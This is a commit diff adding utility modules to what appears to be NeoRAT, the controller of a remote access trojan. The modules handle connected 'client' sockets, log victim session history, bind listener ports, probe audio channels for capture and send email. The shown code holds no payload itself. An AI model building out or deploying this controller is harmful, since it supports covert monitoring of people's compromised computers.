summaryrefslogtreecommitdiff
path: root/domestic/utility
diff options
context:
space:
mode:
authorAL-LCL <alvin@alvinhavel.com>2023-05-19 11:01:49 +0200
committerAL-LCL <alvin@alvinhavel.com>2023-05-19 11:01:49 +0200
commit20dbeb2f38684c65ff0a4b99012c161295708e88 (patch)
treea5b8445f55da2fbbb92443b68e9d7354a290c598 /domestic/utility
NeoRATHEADmain
Diffstat (limited to 'domestic/utility')
-rw-r--r--domestic/utility/delete_client.py21
-rw-r--r--domestic/utility/get_filename.py5
-rw-r--r--domestic/utility/get_io_channels.py43
-rw-r--r--domestic/utility/get_timestamp.py5
-rw-r--r--domestic/utility/loading.py31
-rw-r--r--domestic/utility/program_setup.py38
-rw-r--r--domestic/utility/read_file.py3
-rw-r--r--domestic/utility/send_email.py12
-rw-r--r--domestic/utility/status_message.py86
-rw-r--r--domestic/utility/text_to_ascii.py17
-rw-r--r--domestic/utility/text_to_image.py42
-rw-r--r--domestic/utility/validate_dict_key.py10
-rw-r--r--domestic/utility/write_error.py6
13 files changed, 319 insertions, 0 deletions
diff --git a/domestic/utility/delete_client.py b/domestic/utility/delete_client.py
new file mode 100644
index 0000000..722a1e7
--- /dev/null
+++ b/domestic/utility/delete_client.py
@@ -0,0 +1,21 @@
+from domestic.utility.status_message import *
+from domestic.utility.get_timestamp import *
+from domestic.make.make_directories import *
+from domestic.global_state import *
+
+
+def delete_client(client, write_stdout=True):
+ state['sockets']['clients'][0][client].close()
+ state['sockets']['clients'][0][client] = None
+
+ username = state['sockets']['clients'][2][client]['username']
+ if state['options']['information-gathering']['history']:
+ make_directories([username])
+ with open(f'{state["root"]}/{username}/history.txt', 'a') as f:
+ f.write(f'{username} disconnected at {get_timestamp()}\n')
+
+ for index, item in enumerate(state['sockets']['clients']):
+ del state['sockets']['clients'][index][client]
+
+ if write_stdout:
+ status_message('Client successfully deleted', 'success') \ No newline at end of file
diff --git a/domestic/utility/get_filename.py b/domestic/utility/get_filename.py
new file mode 100644
index 0000000..ce70c0a
--- /dev/null
+++ b/domestic/utility/get_filename.py
@@ -0,0 +1,5 @@
+import time
+
+
+def get_filename(file_type):
+ return time.strftime(f'%Y-%m-%d (%H-%M-%S).{file_type}') \ No newline at end of file
diff --git a/domestic/utility/get_io_channels.py b/domestic/utility/get_io_channels.py
new file mode 100644
index 0000000..c5fa5e2
--- /dev/null
+++ b/domestic/utility/get_io_channels.py
@@ -0,0 +1,43 @@
+import pyaudio
+
+from domestic.global_state import *
+
+
+def get_io_channels():
+ try:
+ p = pyaudio.PyAudio()
+ CHUNK = 81920
+ FORMAT = pyaudio.paInt16
+ RATE = 44100
+ except:
+ pass
+ else:
+ try:
+ stream = p.open(format=FORMAT, channels=2, rate=RATE, input=True, output=False, frames_per_buffer=CHUNK)
+ stream.stop_stream()
+ stream.close()
+ state['settings']['io-channels'][0] = '2'
+ except:
+ try:
+ stream = p.open(format=FORMAT, channels=1, rate=RATE, input=True, output=False, frames_per_buffer=CHUNK)
+ stream.stop_stream()
+ stream.close()
+ state['settings']['io-channels'][0] = '1'
+ except:
+ pass
+
+ try:
+ stream = p.open(format=FORMAT, channels=2, rate=RATE, input=False, output=True, frames_per_buffer=CHUNK)
+ stream.stop_stream()
+ stream.close()
+ state['settings']['io-channels'][1] = '2'
+ except:
+ try:
+ stream = p.open(format=FORMAT, channels=1, rate=RATE, input=False, output=True, frames_per_buffer=CHUNK)
+ stream.stop_stream()
+ stream.close()
+ state['settings']['io-channels'][1] = '1'
+ except:
+ pass
+
+ p.terminate() \ No newline at end of file
diff --git a/domestic/utility/get_timestamp.py b/domestic/utility/get_timestamp.py
new file mode 100644
index 0000000..2d70d8f
--- /dev/null
+++ b/domestic/utility/get_timestamp.py
@@ -0,0 +1,5 @@
+import time
+
+
+def get_timestamp():
+ return time.strftime(f'%Y-%m-%d (%H-%M-%S)') \ No newline at end of file
diff --git a/domestic/utility/loading.py b/domestic/utility/loading.py
new file mode 100644
index 0000000..39c3198
--- /dev/null
+++ b/domestic/utility/loading.py
@@ -0,0 +1,31 @@
+import threading
+import time
+import sys
+
+from domestic.utility.status_message import *
+from domestic.global_state import *
+
+
+def loading(text, blacklist):
+ if state['settings']['loading-animation']:
+ start_time = time.time()
+
+ while True:
+ for i in range(len(text)):
+ if not state['settings']['dynamic']['is-loading']:
+ sys.exit(0)
+ if text[i].lower() in blacklist:
+ continue
+ text = text[:i].lower() + text[i:].capitalize()
+ time_taken = time.time() - start_time
+ status_message(f'[{time_taken:.1f}] {text}', 'loading', {'end': True})
+ time.sleep(0.1)
+ else:
+ status_message(text.capitalize(), 'loading', {'end': True})
+
+def start_loading(text, blacklist=('.', ' ')):
+ state['settings']['dynamic']['is-loading'] = True
+ threading.Thread(target=loading, args=(text, blacklist), daemon=True).start()
+
+def stop_loading():
+ state['settings']['dynamic']['is-loading'] = False \ No newline at end of file
diff --git a/domestic/utility/program_setup.py b/domestic/utility/program_setup.py
new file mode 100644
index 0000000..d14a6df
--- /dev/null
+++ b/domestic/utility/program_setup.py
@@ -0,0 +1,38 @@
+import threading
+import argparse
+
+from domestic.utility.get_io_channels import *
+from domestic.modules.socket_handler import *
+from domestic.utility.status_message import *
+from domestic.utility.text_to_ascii import *
+from domestic.session.session_queue import *
+from domestic.utility.write_error import *
+from domestic.global_state import *
+from domestic.shell.server import *
+
+
+def program_setup():
+ parser = argparse.ArgumentParser(description=state['description'])
+ parser.add_argument('-ip', '--ipv4', default='localhost', help='IP of host.')
+ parser.add_argument('-p', '--port', type=int, default=1200, help='Port of host.')
+ args = parser.parse_args()
+
+ try:
+ get_io_channels()
+ threading.Thread(target=listening, args=(args.ipv4, str(args.port), False), daemon=True).start()
+ for index, module in enumerate([*state['sockets']['modules']]):
+ bind_socket(args.ipv4, str(args.port + (index + 1)), module, False)
+ except Exception as err:
+ write_error(err)
+ status_message('Socket binding error, please verify IP / port argument', 'danger', {'end': True})
+ raise Exception('Argument parsing error')
+
+ threading.Thread(target=session_queue, daemon=True).start()
+
+ status_message(text_to_ascii(state['name']), 'pure', {'end': True})
+ print()
+ status_message(state['description'], 'pure', {'end': True})
+ print()
+ status_message(state['author'], 'pure', {'end': True})
+ print()
+ status_message(None, 'program') \ No newline at end of file
diff --git a/domestic/utility/read_file.py b/domestic/utility/read_file.py
new file mode 100644
index 0000000..7c9fcea
--- /dev/null
+++ b/domestic/utility/read_file.py
@@ -0,0 +1,3 @@
+def read_file(location):
+ with open(location, 'rb') as f:
+ return f.read() \ No newline at end of file
diff --git a/domestic/utility/send_email.py b/domestic/utility/send_email.py
new file mode 100644
index 0000000..4edfabf
--- /dev/null
+++ b/domestic/utility/send_email.py
@@ -0,0 +1,12 @@
+import smtplib
+
+
+def send_email(sender, sender_pw, recievers, subject, text):
+ message = f'From: {sender}\nTo: {recievers}\nSubject: {subject}\n\n{text}'
+
+ server = smtplib.SMTP('smtp.gmail.com', 587)
+ server.ehlo()
+ server.starttls()
+ server.login(sender, sender_pw)
+ server.sendmail(sender, recievers, message)
+ server.close() \ No newline at end of file
diff --git a/domestic/utility/status_message.py b/domestic/utility/status_message.py
new file mode 100644
index 0000000..c8e4a32
--- /dev/null
+++ b/domestic/utility/status_message.py
@@ -0,0 +1,86 @@
+from colorama import init, Fore, Style
+init()
+
+from domestic.utility.validate_dict_key import *
+from domestic.global_state import *
+
+
+def status_message(data, status, options={}):
+ dots = validate_dict_key(options, 'dots')
+ exclamation_point = validate_dict_key(options, 'point')
+ end = validate_dict_key(options, 'end')
+ custom = validate_dict_key(options, 'custom')
+ session = state['session']['active']
+ username = state['session']['username']
+ name = state['name']
+ end_result = ''
+
+ if status == 'raw':
+ print(f'{Fore.CYAN}{data}{Style.RESET_ALL}')
+ return
+
+ try:
+ messages = [x for x in data.split('\n') if x != '']
+ except:
+ messages = [None]
+
+ if exclamation_point == 'empty':
+ exclamation_point = ''
+ elif exclamation_point == 'dot':
+ exclamation_point = '.'
+ elif exclamation_point:
+ exclamation_point = '!'
+ elif status == 'success':
+ exclamation_point = '!'
+ else:
+ exclamation_point = '.'
+
+ if dots:
+ dots = '..'
+ else:
+ dots = ''
+
+ if end:
+ end_result = ''
+ else:
+ end_result = f'\n{Fore.BLUE}{name}{Style.RESET_ALL}{Fore.RED}>{Style.RESET_ALL}'
+
+ if custom:
+ custom = f'\b{custom}'
+ else:
+ custom = ''
+
+ if session:
+ if end:
+ end_result = ''
+ else:
+ end_result = f'\n{Fore.BLUE}{username}{Style.RESET_ALL} {Fore.RED}=>{Style.RESET_ALL} {Fore.BLUE}Terminal{Style.RESET_ALL}{Fore.RED}>{Style.RESET_ALL}'
+
+ for index, message in enumerate(messages):
+ if index == 0 and session and state['settings']['loading']:
+ print(' ' * 25, end='\r')
+
+ if status == 'success':
+ print(f'{Fore.GREEN}[{Style.RESET_ALL}+{custom}{Fore.GREEN}]{Style.RESET_ALL} {Fore.GREEN}{message}{exclamation_point}{dots}{Style.RESET_ALL}')
+ elif status == 'danger':
+ print(f'{Fore.RED}[{Style.RESET_ALL}-{custom}{Fore.RED}]{Style.RESET_ALL} {Fore.RED}{message}{exclamation_point}{dots}{Style.RESET_ALL}')
+ elif status == 'warning':
+ print(f'{Fore.YELLOW}[{Style.RESET_ALL}!{custom}{Fore.YELLOW}]{Style.RESET_ALL} {Fore.YELLOW}{message}{exclamation_point}{dots}{Style.RESET_ALL}')
+ elif status == 'primary':
+ print(f'{Fore.BLUE}[{Style.RESET_ALL}i{custom}{Fore.BLUE}]{Style.RESET_ALL} {Fore.BLUE}{message}{exclamation_point}{dots}{Style.RESET_ALL}')
+ elif status == 'magenta':
+ print(f'{Fore.MAGENTA}[{Style.RESET_ALL}i{custom}{Fore.MAGENTA}]{Style.RESET_ALL} {Fore.MAGENTA}{message}{exclamation_point}{dots}{Style.RESET_ALL}')
+ elif status == 'pure':
+ print(f'{Fore.CYAN}{message}{Style.RESET_ALL}')
+ elif status == 'loading':
+ print(f'{Fore.CYAN}{message}{Style.RESET_ALL}', end='\r', flush=True)
+ elif status == 'program':
+ if session:
+ print(f'{Fore.BLUE}{username}{Style.RESET_ALL} {Fore.RED}=>{Style.RESET_ALL} {Fore.BLUE}Terminal{Style.RESET_ALL}{Fore.RED}>{Style.RESET_ALL}', end='')
+ else:
+ print(f'{Fore.BLUE}{name}{Style.RESET_ALL}{Fore.RED}>{Style.RESET_ALL}', end='')
+ else:
+ raise Exception('Invalid color selection')
+
+ if index == (len(messages) -1) and status != 'program':
+ print(end=end_result) \ No newline at end of file
diff --git a/domestic/utility/text_to_ascii.py b/domestic/utility/text_to_ascii.py
new file mode 100644
index 0000000..0b6d634
--- /dev/null
+++ b/domestic/utility/text_to_ascii.py
@@ -0,0 +1,17 @@
+import numpy
+
+from PIL import Image, ImageDraw, ImageFont
+
+
+def text_to_ascii(text):
+ myfont = ImageFont.truetype('arial.ttf', 18)
+ size = myfont.getsize(text)
+ img = Image.new('1', size, 'black')
+ draw = ImageDraw.Draw(img)
+ draw.text((0, 0), text, 'white', font=myfont)
+ pixels = numpy.array(img, dtype=numpy.uint8)
+ chars = numpy.array([' ', '%'], dtype='U1')[pixels]
+ strings = [line for line in chars.view('U' + str(chars.shape[1])).flatten() if not line.isspace()]
+ result = '\n'.join(strings)
+
+ return result \ No newline at end of file
diff --git a/domestic/utility/text_to_image.py b/domestic/utility/text_to_image.py
new file mode 100644
index 0000000..0adb304
--- /dev/null
+++ b/domestic/utility/text_to_image.py
@@ -0,0 +1,42 @@
+from PIL import ImageFont, Image, ImageDraw, ImageOps
+
+from domestic.utility.write_error import *
+
+
+def text_to_image(text):
+ PIXEL_ON = 255
+ PIXEL_OFF = 1
+
+ grayscale = 'L'
+ lines = tuple(l.rstrip() for l in text.split('\n'))
+
+ large_font = 40
+ font_path = 'cour.ttf'
+
+ try:
+ font = ImageFont.truetype(font_path, size=large_font)
+ except IOError as err:
+ write_error(err)
+ font = ImageFont.load_default()
+
+ pt2px = lambda pt: int(round(pt * 96.0 / 72))
+ max_width_line = max(lines, key=lambda s: font.getsize(s)[0])
+ test_string = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+ max_height = pt2px(font.getsize(test_string)[1])
+ max_width = pt2px(font.getsize(max_width_line)[0])
+ height = max_height * len(lines)
+ width = int(round(max_width + 40))
+ image = Image.new(grayscale, (width, height), color=PIXEL_OFF)
+ draw = ImageDraw.Draw(image)
+
+ vertical_position = 5
+ horizontal_position = 5
+ line_spacing = int(round(max_height * 0.8))
+
+ for line in lines:
+ draw.text((horizontal_position, vertical_position), line, fill=PIXEL_ON, font=font)
+ vertical_position += line_spacing
+ c_box = ImageOps.invert(image).getbbox()
+ image = image.crop(c_box)
+
+ return image \ No newline at end of file
diff --git a/domestic/utility/validate_dict_key.py b/domestic/utility/validate_dict_key.py
new file mode 100644
index 0000000..18e246b
--- /dev/null
+++ b/domestic/utility/validate_dict_key.py
@@ -0,0 +1,10 @@
+def validate_dict_key(dictionary, key, lower=True):
+ try:
+ if lower:
+ return dictionary[key].lower()
+ else:
+ return dictionary[key]
+ except KeyError:
+ return None
+ except:
+ return dictionary[key] \ No newline at end of file
diff --git a/domestic/utility/write_error.py b/domestic/utility/write_error.py
new file mode 100644
index 0000000..a65b3bc
--- /dev/null
+++ b/domestic/utility/write_error.py
@@ -0,0 +1,6 @@
+from domestic.global_state import *
+
+
+def write_error(error):
+ if state['settings']['debug']:
+ print(f'Error: {error}') \ No newline at end of file